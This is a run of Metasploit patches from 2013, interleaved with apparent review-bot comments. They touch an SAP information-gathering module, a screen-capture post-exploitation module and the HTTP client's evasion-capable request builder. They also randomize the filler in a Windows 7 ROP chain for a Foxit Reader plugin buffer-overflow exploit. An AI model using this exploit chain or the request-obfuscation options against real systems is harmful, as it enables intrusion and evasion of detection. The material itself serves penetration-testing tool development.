<< [ "IPv4 Address", rfcipaddr ] + saptbl << [ "IPv6 Address", rfcipv6addr ] + saptbl << [ "System ID", rfcsysid ] + saptbl << [ "RFC Destination", rfcdest ] + saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ] + saptbl << [ "Character Set", rfcchartyp ] + saptbl << [ "Daylight Saving Time", rfcdayst ] + saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")] + # output table + print(saptbl.to_s) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :sname => 'sap', + :type => 'sap.version.release', + :data => "Release Status of SAP System: #{rfcsaprl}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :sname => 'sap', + :type => 'sap.version.rfc_log', + :data => "RFC Log Version: #{rfcproto}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :sname => 'sap', + :type => 'sap.version.kernel', + :data => "Kernel Release: #{rfckernrl}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :sname => 'sap', + :type => 'system.os', + :data => "Operating System: #{rfcopsys}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.db.hostname', + :data => "Database Host: #{rfcdbhost}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.db_system', + :data => "Central Database System: #{rfcdbsys}" + ) + + if rfcinttyp == 'LIT' + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.endianness', + :data => "Integer Format: Little Endian" + ) + else + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.endianness', + :data => "Integer Format: Big Endian" + ) + end + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.hostname', + :data => "Hostname: #{rfchost}" + ) + + if rfcflotyp == 'IE3' + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.float_type', + :data => 
"Float Type Format: IEEE" + ) + else + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.float_type', + :data => "Float Type Format: IBM/370" + ) + end + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.ip.v4', + :data => "IPv4 Address: #{rfcipaddr}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.ip.v6', + :data => "IPv6 Address: #{rfcipv6addr}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.instance', + :data => "System ID: #{rfcsysid}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.rfc.destination', + :data => "RFC Destination: #{rfcdest}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.timezone', + :data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.charset', + :data => "Character Set: #{rfcchartyp}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.daylight_saving_time', + :data => "Daylight Saving Time: #{rfcdayst}" + ) + + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.machine_id', + :data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}" + ) + end +end \ No newline at end of file From ff13a9fb1fd122b9f698ad89f59b1b917a96cb24 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 13 Feb 2013 14:03:10 -0600 Subject: [PATCH 017/139] Randomize some gadgets --- .../browser/foxit_reader_plugin_url_bof.rb | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 7e5d6353a3..f7ece6273a 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb 
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -92,6 +92,10 @@ class Metasploit3 < Msf::Exploit::Remote return nil end + def junk + return rand_text_alpha(4).unpack("L")[0].to_i + end + # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module) def win7_rop_chain @@ -103,18 +107,18 @@ class Metasploit3 < Msf::Exploit::Remote 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (RETN offset compensation) + junk, # Filler (RETN offset compensation) 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] 0x00001000, # 0x00001000-> edx 0x1000d9ec, # XOR EDX, EDX # RETN 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (compensate) + jun, # Filler (compensate) 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) + junk, # Filler (RETN offset compensation) + junk, # Filler (RETN offset compensation) + junk, # Filler (RETN offset compensation) + junk, # Filler (RETN offset compensation) 0x00000040, # 0x00000040-> ecx 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] 0x00000001, # 0x00000001-> ebx From 8a91f0d7ecc48ece4cfd3154972ec44ef4884ecb Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Thu, 14 Feb 2013 14:04:45 -0600 Subject: [PATCH 018/139] rescue ENOENT as well --- modules/post/windows/gather/screen_spy.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 7e03e2440e..5f1e1eb505 100644 --- a/modules/post/windows/gather/screen_spy.rb 
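Review bot: `return rand_text_alpha(4).unpack("L")[0].to_i` — `unpack("L")` already yields an Integer, so the trailing `.to_i` is a no-op, and the explicit `return` is unidiomatic for a one-expression method; `def junk; rand_text_alpha(4).unpack("L")[0]; end` says the same. A one-line comment such as `# random 32-bit value for the filler slots in the chain below` would make the helper's purpose clear without reading its call sites.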
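Review bot: `jun, # Filler (compensate)` references a name that is not defined anywhere in this file as far as the hunks show; the helper added above is `junk`, so evaluating win7_rop_chain raises NameError at that element while every other replaced slot correctly reads `junk`. The array being edited continues past the end of the hunk, so the remaining entries could not be checked for the same typo.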
+++ b/modules/post/windows/gather/screen_spy.rb
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Post
 end
 system(cmd) if cmd
 end
-rescue IOError => e
+rescue IOError, Errno::ENOENT => e
 print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}")
 return
 end
From dd26b081976491bf91a89eaa08c9a9db3bf001e5 Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Sun, 17 Feb 2013 19:25:27 -0600
Subject: [PATCH 019/139] first run at Clientrequest object need a reliable object class for request_raw and request_cgi so that we can manipulate requests in a safe and sane manner. It is not a eprfect solution, but should fix what we need for the auth work.
---
 lib/rex/proto/http.rb | 1 +
 lib/rex/proto/http/client.rb | 444 ++------------------------
 lib/rex/proto/http/client_request.rb | 454 +++++++++++++++++++++++++++
 3 files changed, 480 insertions(+), 419 deletions(-)
 create mode 100644 lib/rex/proto/http/client_request.rb
diff --git a/lib/rex/proto/http.rb b/lib/rex/proto/http.rb
index 1ff65061ec..85a4f31e3c 100644
--- a/lib/rex/proto/http.rb
+++ b/lib/rex/proto/http.rb
@@ -4,3 +4,4 @@ require 'rex/proto/http/request'
 require 'rex/proto/http/response'
 require 'rex/proto/http/client'
 require 'rex/proto/http/server'
+require 'rex/proto/http/client_request'
\ No newline at end of file
diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb
index 75ba1f9574..690cd58f4d 100644
--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants'
 require 'rex/proto/ntlm/utils'
 require 'rex/proto/ntlm/exceptions'
+require 'pry'
+
 module Rex
 module Proto
 module Http
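Review bot: Only `Errno::ENOENT` is added beside `IOError`, so a screenshot store that fails for any other OS-level reason (the destination not being writable, for instance) still escapes the handler this line was evidently meant to make robust; `rescue IOError, SystemCallError => e` covers the whole Errno family. Interpolating `e.backtrace` prints the Array with its inspect formatting on a single line; `e.backtrace.join("\n")` would be readable. The method this rescue belongs to starts outside the hunk.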
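Review bot: `require 'pry'` makes the pry gem a hard load-time dependency of lib/rex/proto/http/client.rb, so any install without it fails to load the HTTP client at all, and an interactive debugger hook does not belong in committed library code. Drop the two added lines (the next commit on this page does remove them again); a debugger is a development-time tool that should stay in a local Gemfile group.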
@@ -240,103 +242,32 @@ class Client # # @return [Request] def request_cgi(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_cgi = opts['uri'] || '/' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] - c_enc = opts['encode'] || false - c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] - c_meth = opts['method'] || 'GET' - c_path = opts['path_info'] - c_prot = opts['proto'] || 'HTTP' - c_qs = opts['query'] || '' - c_rawh = opts['raw_headers'] || config['raw_headers'] || '' - c_type = opts['ctype'] || 'application/x-www-form-urlencoded' - c_varg = opts['vars_get'] || {} - c_varp = opts['vars_post'] || {} - c_vers = opts['version'] || config['version'] || '1.1' + opts['agent'] ||= config['agent'] + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + opts['version'] = opts['version'] || config['version'] || '1.1' + opts['cgi'] = true + opts['port'] = self.port - uri = set_cgi(c_cgi) - qstr = c_qs - pstr = c_body - - if (config['pad_get_params']) - 1.upto(config['pad_get_params_count'].to_i) do |i| - qstr << '&' if qstr.length > 0 - qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) - qstr << '=' - qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) - end + if opts['encode_params'] == true or opts['encode_params'].nil? 
+ opts['encode_params'] = true + else + opts['encode_params'] = false end - c_varg.each_pair do |var,val| - qstr << '&' if qstr.length > 0 - qstr << (c_enc_p ? set_encode_uri(var) : var) - qstr << '=' - qstr << (c_enc_p ? set_encode_uri(val) : val) - end - - if (config['pad_post_params']) - 1.upto(config['pad_post_params_count'].to_i) do |i| - rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) - rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) - pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(rand_var) : rand_var) - pstr << '=' - pstr << (c_enc_p ? set_encode_uri(rand_val) : rand_val) - end - end - - c_varp.each_pair do |var,val| - pstr << '&' if pstr.length > 0 - pstr << (c_enc_p ? set_encode_uri(var) : var) - pstr << '=' - pstr << (c_enc_p ? set_encode_uri(val) : val) - end - - req = '' - req << set_method(c_meth) - req << set_method_uri_spacer() - req << set_uri_prepend() - req << (c_enc ? set_encode_uri(uri):uri) - - if (qstr.length > 0) - req << '?' - req << qstr - end - - req << set_path_info(c_path) - req << set_uri_append() - req << set_uri_version_spacer() - req << set_version(c_prot, c_vers) - req << set_host_header(c_host) - req << set_agent_header(c_ag) - - if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end - end - - req << set_cookie_header(c_cook) - req << set_connection_header(c_conn) - req << set_extra_headers(c_head) - - req << set_content_type_header(c_type) - req << set_content_len_header(pstr.length) - req << set_chunked_header() - req << set_raw_headers(c_rawh) - req << set_body(pstr) - - request = Request.new - request.parse(req) - request.options = opts - - request + req = ClientRequest.new(opts,self.config) end # 
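Review bot: `opts['basic_auth']` is still computed at the top of request_cgi, but nothing in the new code passes it on: the deleted lines emitted the Basic Authorization header through `set_basic_auth_header`, and `ClientRequest.new(opts,self.config)` only hands over the hash, so unless ClientRequest reads `basic_auth` itself (the version added in this commit does not, as far as visible) requests built here silently go out without credentials. The method now also rewrites the caller's `opts` hash in place (`opts['cgi'] = true`, `opts['port'] = self.port`, the `||=` defaults) where the old code copied values into locals, so a caller reusing one options hash across requests sees those mutations; working on `opts = opts.dup` first keeps the old contract. `req = ClientRequest.new(opts,self.config)` assigns a local that is never read — the assignment's value is returned anyway — and the `@return [Request]` doc just above the hunk now names the wrong class.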
@@ -855,284 +786,6 @@ class Client pipeline end - # - # Return the encoded URI - # ['none','hex-normal', 'hex-all', 'u-normal', 'u-all'] - def set_encode_uri(uri) - a = uri - self.config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, self.config['uri_encode_mode']) - } - return a - end - - # - # Return the encoded query string - # - def set_encode_qs(qs) - a = qs - self.config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, self.config['uri_encode_mode']) - } - return a - end - - # - # Return the uri - # - def set_uri(uri) - - if (self.config['uri_dir_self_reference']) - uri.gsub!('/', '/./') - end - - if (self.config['uri_dir_fake_relative']) - buf = "" - uri.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri = buf - end - - if (self.config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << ((self.port == 80) ? "" : ":#{self.port}") - url << uri - url - else - uri - end - end - - # - # Return the cgi - # - def set_cgi(uri) - - if (self.config['uri_dir_self_reference']) - uri.gsub!('/', '/./') - end - - if (self.config['uri_dir_fake_relative']) - buf = "" - uri.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri = buf - end - - url = uri - - if (self.config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << (self.port == 80) ? 
"" : ":#{self.port}" - url << uri - end - - url - end - - # - # Return the HTTP method string - # - def set_method(method) - ret = method - - if (self.config['method_random_valid']) - ret = ['GET', 'POST', 'HEAD'][rand(3)] - end - - if (self.config['method_random_invalid']) - ret = Rex::Text.rand_text_alpha(rand(20)+1) - end - - if (self.config['method_random_case']) - ret = Rex::Text.to_rand_case(ret) - end - - ret - end - - # - # Return the HTTP version string - # - def set_version(protocol, version) - ret = protocol + "/" + version - - if (self.config['version_random_valid']) - ret = protocol + "/" + ['1.0', '1.1'][rand(2)] - end - - if (self.config['version_random_invalid']) - ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) - end - - if (self.config['version_random_case']) - ret = Rex::Text.to_rand_case(ret) - end - - ret << "\r\n" - end - - # - # Return the HTTP seperator and body string - # - def set_body(data) - return "\r\n" + data if self.config['chunked_size'] == 0 - str = data.dup - chunked = '' - while str.size > 0 - chunk = str.slice!(0,rand(self.config['chunked_size']) + 1) - chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" - end - "\r\n" + chunked + "0\r\n\r\n" - end - - # - # Return the HTTP path info - # TODO: - # * Encode path information - def set_path_info(path) - path ? 
path : '' - end - - # - # Return the spacing between the method and uri - # - def set_method_uri_spacer - len = self.config['pad_method_uri_count'].to_i - set = " " - buf = "" - - case self.config['pad_method_uri_type'] - when 'tab' - set = "\t" - when 'apache' - set = "\t \x0b\x0c\x0d" - end - - while(buf.length < len) - buf << set[ rand(set.length) ] - end - - return buf - end - - # - # Return the spacing between the uri and the version - # - def set_uri_version_spacer - len = self.config['pad_uri_version_count'].to_i - set = " " - buf = "" - - case self.config['pad_uri_version_type'] - when 'tab' - set = "\t" - when 'apache' - set = "\t \x0b\x0c\x0d" - end - - while(buf.length < len) - buf << set[ rand(set.length) ] - end - - return buf - end - - # - # Return the padding to place before the uri - # - def set_uri_prepend - prefix = "" - - if (self.config['uri_fake_params_start']) - prefix << '/%3fa=b/../' - end - - if (self.config['uri_fake_end']) - prefix << '/%20HTTP/1.0/../../' - end - - prefix - end - - # - # Return the padding to place before the uri - # - def set_uri_append - # TODO: - # * Support different padding types - "" - end - - # - # Return the HTTP Host header - # - def set_host_header(host=nil) - return "" if self.config['uri_full_url'] - host ||= self.config['vhost'] - - # IPv6 addresses must be placed in brackets - if Rex::Socket.is_ipv6?(host) - host = "[#{host}]" - end - - # The port should be appended if non-standard - if not [80,443].include?(self.port) - host = host + ":#{port}" - end - - set_formatted_header("Host", host) - end - - # - # Return the HTTP agent header - # - def set_agent_header(agent) - agent ? set_formatted_header("User-Agent", agent) : "" - end - - # - # Return the HTTP cookie header - # - def set_cookie_header(cookie) - cookie ? set_formatted_header("Cookie", cookie) : "" - end - - # - # Return the HTTP connection header - # - def set_connection_header(conn) - conn ? 
set_formatted_header("Connection", conn) : "" - end - - # - # Return the content type header - # - def set_content_type_header(ctype) - set_formatted_header("Content-Type", ctype) - end - - # - # Return the content length header - def set_content_len_header(clen) - return "" if self.config['chunked_size'] > 0 - set_formatted_header("Content-Length", clen) - end - # # Return the Authorization basic-auth header # @@ -1140,53 +793,6 @@ class Client auth ? set_formatted_header("Authorization", "Basic " + Rex::Text.encode_base64(auth)) : "" end - # - # Return a string of formatted extra headers - # - def set_extra_headers(headers) - buf = '' - - if (self.config['pad_fake_headers']) - 1.upto(self.config['pad_fake_headers_count'].to_i) do |i| - buf << set_formatted_header( - Rex::Text.rand_text_alphanumeric(rand(32)+1), - Rex::Text.rand_text_alphanumeric(rand(32)+1) - ) - end - end - - headers.each_pair do |var,val| - buf << set_formatted_header(var, val) - end - - buf - end - - def set_chunked_header() - return "" if self.config['chunked_size'] == 0 - set_formatted_header('Transfer-Encoding', 'chunked') - end - - # - # Return a string of raw header data - # - def set_raw_headers(data) - data - end - - # - # Return a formatted header string - # - def set_formatted_header(var, val) - if (self.config['header_folding']) - "#{var}:\r\n\t#{val}\r\n" - else - "#{var}: #{val}\r\n" - end - end - - - # # The client request configuration # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb new file mode 100644 index 0000000000..cb76327f2b --- /dev/null +++ b/lib/rex/proto/http/client_request.rb 
@@ -0,0 +1,454 @@ +# -*- coding: binary -*- +require 'uri' +require 'rex/proto/http' + +module Rex +module Proto +module Http + +class ClientRequest + + attr_accessor :authorization + attr_accessor :cgi + attr_accessor :config + attr_accessor :connection + attr_accessor :content_type + attr_accessor :cookie + attr_accessor :data + attr_accessor :encode + attr_accessor :encode_params + attr_accessor :headers + attr_accessor :host + attr_accessor :method + attr_accessor :path + attr_accessor :port + attr_accessor :protocol + attr_accessor :query + attr_accessor :raw_headers + attr_accessor :uri + attr_accessor :user_agent + attr_accessor :vars_get + attr_accessor :vars_post + attr_accessor :version + + def initialize(opts={}, client_config) + @cgi = opts['cgi'] + @config = client_config + @connection = opts['connection'] + @content_type = opts['ctype'] + @cookie = opts['cookie'] + @data = opts['data'] + @encode = opts['encode'] + @encode_params = opts['encode_params'] + @headers = opts['headers'] + @host = opts['vhost'] + @method = opts['method'] + @path = opts['path_info'] + @port = opts['port'] + @protocol = opts['proto'] + @query = opts['query'] + @raw_headers = opts['raw_headers'] + @uri = opts['uri'] + @user_agent = opts['agent'] + @vars_get = opts['vars_get'] + @vars_post = opts['vars_post'] + @version = opts['version'] + end + + def to_s + + # Start GET query string + qstr = query + + # Start POST data string + pstr = data + + if cgi == true + uri_str= set_cgi + + if (config['pad_get_params']) + 1.upto(config['pad_get_params_count'].to_i) do |i| + qstr << '&' if qstr.length > 0 + qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + qstr << '=' + qstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + end + end + + vars_get.each_pair do |var,val| + qstr << '&' if qstr.length > 0 + qstr << (encode_params ? set_encode_uri(var) : var) + qstr << '=' + qstr << (encode_params ? 
set_encode_uri(val) : val) + end + + if (config['pad_post_params']) + 1.upto(config['pad_post_params_count'].to_i) do |i| + rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) + rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) + pstr << '&' if pstr.length > 0 + pstr << (encode_params ? set_encode_uri(rand_var) : rand_var) + pstr << '=' + pstr << (encode_params ? set_encode_uri(rand_val) : rand_val) + end + end + + vars_post.each_pair do |var,val| + pstr << '&' if pstr.length > 0 + pstr << (encode_params ? set_encode_uri(var) : var) + pstr << '=' + pstr << (encode_params ? set_encode_uri(val) : val) + end + else + uri_str = set_uri + if encode + qstr = set_encode_uri(qstr) + end + end + + req = '' + req << set_method + req << set_method_uri_spacer() + req << set_uri_prepend() + + if encode + req << set_encode_uri(uri_str) + else + req << uri_str + end + + + if (qstr.length > 0) + req << '?' + req << qstr + end + + req << set_path_info + req << set_uri_append() + req << set_uri_version_spacer() + req << set_version + req << set_host_header + + # If an explicit User-Agent header is set, then use that instead of the value of user_agent + unless headers.keys.map{|x| x.downcase }.include?('user-agent') + req << set_agent_header + end + + if authorization + req << set_auth_header + end + + req << set_cookie_header + req << set_connection_header + req << set_extra_headers + + req << set_content_type_header + req << set_content_len_header(pstr.length) + req << set_chunked_header() + req << raw_headers + req << set_body(pstr) + end + + protected + + def set_auth_header + "Authorization: " + authorization + end + + def set_uri + if (config['uri_dir_self_reference']) + uri.gsub!('/', '/./') + end + + if (config['uri_dir_fake_relative']) + buf = "" + uri.split('/').each do |part| + cnt = rand(8)+2 + 1.upto(cnt) { |idx| + buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) + } + buf << ("/.." 
* cnt) + buf << "/" + part + end + uri = buf + end + + if (config['uri_full_url']) + url = self.ssl ? "https" : "http" + url << self.config['vhost'] + url << ((self.port == 80) ? "" : ":#{self.port}") + url << uri + url + else + uri + end + end + + def set_cgi + uri_str = uri + if (config['uri_dir_self_reference']) + uri_str.gsub!('/', '/./') + end + + if (config['uri_dir_fake_relative']) + buf = "" + uri_str.split('/').each do |part| + cnt = rand(8)+2 + 1.upto(cnt) { |idx| + buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) + } + buf << ("/.." * cnt) + buf << "/" + part + end + uri_str = buf + end + + url = uri_str + + if (config['uri_full_url']) + url = self.ssl ? "https" : "http" + url << self.config['vhost'] + url << (self.port == 80) ? "" : ":#{self.port}" + url << uri_str + end + + url + end + + def set_encode_uri(str) + a = str + config['uri_encode_count'].times { + a = Rex::Text.uri_encode(a, config['uri_encode_mode']) + } + return a + end + + def set_method + ret = method + + if (config['method_random_valid']) + ret = ['GET', 'POST', 'HEAD'][rand(3)] + end + + if (config['method_random_invalid']) + ret = Rex::Text.rand_text_alpha(rand(20)+1) + end + + if (config['method_random_case']) + ret = Rex::Text.to_rand_case(ret) + end + + ret + end + + def set_method_uri_spacer + len = config['pad_method_uri_count'].to_i + set = " " + buf = "" + + case config['pad_method_uri_type'] + when 'tab' + set = "\t" + when 'apache' + set = "\t \x0b\x0c\x0d" + end + + while(buf.length < len) + buf << set[ rand(set.length) ] + end + + return buf + end + + # + # Return the padding to place before the uri + # + def set_uri_prepend + prefix = "" + + if (config['uri_fake_params_start']) + prefix << '/%3fa=b/../' + end + + if (config['uri_fake_end']) + prefix << '/%20HTTP/1.0/../../' + end + + prefix + end + + # + # Return the HTTP path info + # TODO: + # * Encode path information + def set_path_info + path ? 
path : '' + end + + # + # Return the padding to place before the uri + # + def set_uri_append + # TODO: + # * Support different padding types + "" + end + + # + # Return the spacing between the uri and the version + # + def set_uri_version_spacer + len = config['pad_uri_version_count'].to_i + set = " " + buf = "" + + case config['pad_uri_version_type'] + when 'tab' + set = "\t" + when 'apache' + set = "\t \x0b\x0c\x0d" + end + + while(buf.length < len) + buf << set[ rand(set.length) ] + end + + return buf + end + + # + # Return the HTTP version string + # + def set_version + ret = protocol + "/" + version + + if (config['version_random_valid']) + ret = protocol + "/" + ['1.0', '1.1'][rand(2)] + end + + if (config['version_random_invalid']) + ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) + end + + if (config['version_random_case']) + ret = Rex::Text.to_rand_case(ret) + end + + ret << "\r\n" + end + + # + # Return the HTTP Host header + # + def set_host_header + return "" if config['uri_full_url'] + host ||= config['vhost'] + + # IPv6 addresses must be placed in brackets + if Rex::Socket.is_ipv6?(host) + host = "[#{host}]" + end + + # The port should be appended if non-standard + if not [80,443].include?(port) + host = host + ":#{port}" + end + + set_formatted_header("Host", host) + end + + # + # Return the HTTP agent header + # + def set_agent_header + user_agent ? set_formatted_header("User-Agent", user_agent) : "" + end + + # + # Return a formatted header string + # + def set_formatted_header(var, val) + if (self.config['header_folding']) + "#{var}:\r\n\t#{val}\r\n" + else + "#{var}: #{val}\r\n" + end + end + + # + # Return the HTTP cookie header + # + def set_cookie_header + cookie ? set_formatted_header("Cookie", cookie) : "" + end + + # + # Return the HTTP connection header + # + def set_connection_header + connection ? 
set_formatted_header("Connection", connection) : "" + end + + # + # Return the content type header + # + def set_content_type_header + set_formatted_header("Content-Type", content_type) + end + + # + # Return the content length header + def set_content_len_header(clen) + return "" if config['chunked_size'] > 0 + set_formatted_header("Content-Length", clen) + end + + # + # Return a string of formatted extra headers + # + def set_extra_headers + buf = '' + + if (config['pad_fake_headers']) + 1.upto(config['pad_fake_headers_count'].to_i) do |i| + buf << set_formatted_header( + Rex::Text.rand_text_alphanumeric(rand(32)+1), + Rex::Text.rand_text_alphanumeric(rand(32)+1) + ) + end + end + + headers.each_pair do |var,val| + buf << set_formatted_header(var, val) + end + + buf + end + + def set_chunked_header + return "" if config['chunked_size'] == 0 + set_formatted_header('Transfer-Encoding', 'chunked') + end + + # + # Return the HTTP seperator and body string + # + def set_body(bdata) + return "\r\n" + bdata if config['chunked_size'] == 0 + str = bdata.dup + chunked = '' + while str.size > 0 + chunk = str.slice!(0,rand(config['chunked_size']) + 1) + chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" + end + "\r\n" + chunked + "0\r\n\r\n" + end + + +end + + + +end +end +end \ No newline at end of file From 87d9af585eada1536c65fdb7dc53759fb687f6a3 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Sun, 17 Feb 2013 21:35:19 -0600 Subject: [PATCH 020/139] fix request_raw --- lib/rex/proto/http/client.rb | 79 ++++++++-------------------- lib/rex/proto/http/client_request.rb | 15 ++++-- 2 files changed, 33 insertions(+), 61 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 690cd58f4d..0244a9eb3e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
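Review bot: `to_s` appends into `qstr = query` and `pstr = data`, which are the very String objects held in `@query`/`@data` (and, through request_cgi, in the caller's opts), so every call to `to_s` re-appends the padding and each `vars_get`/`vars_post` pair and a request serialized twice is sent with doubled parameters; `qstr = query.dup` and `pstr = data.dup` keep the attributes read-only. In `set_host_header`, `host ||= config['vhost']` declares a local named `host` that shadows the accessor, so the per-request `opts['vhost']` is never used and the Host header always carries `config['vhost']`; write `hdr_host = host || config['vhost']` and use that local for the bracket and port handling. `set_auth_header` returns `"Authorization: " + authorization` without the terminating `\r\n`, so the next header would be glued onto the same line, and `@authorization` is never assigned in `initialize`, so the branch is dead code as written. `set_uri` and `set_cgi` call `self.ssl`, which this class does not define, and join `"https"`/`"http"` straight to the vhost with no `://`, both carried over from the deleted Client code. In `set_cgi`, `url << (self.port == 80) ? "" : ":#{self.port}"` applies `<<` to the boolean before the ternary is evaluated (TypeError), because `<<` binds tighter than `?:`; the parenthesised form used in `set_uri` is the correct one.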
@@ -8,8 +8,6 @@ require 'rex/proto/ntlm/constants'
 require 'rex/proto/ntlm/utils'
 require 'rex/proto/ntlm/exceptions'
-require 'pry'
-
 module Rex
 module Proto
 module Http
@@ -171,62 +169,27 @@ class Client # # @return [Request] def request_raw(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] - c_enc = opts['encode'] || false - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] || self.hostname - c_meth = opts['method'] || 'GET' - c_prot = opts['proto'] || 'HTTP' - c_qs = opts['query'] - c_rawh = opts['raw_headers']|| config['raw_headers'] || '' - c_uri = opts['uri'] || '/' - c_vers = opts['version'] || config['version'] || '1.1' + opts['agent'] ||= config['agent'] + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' + opts['cgi'] = false + opts['port'] = self.port - # An 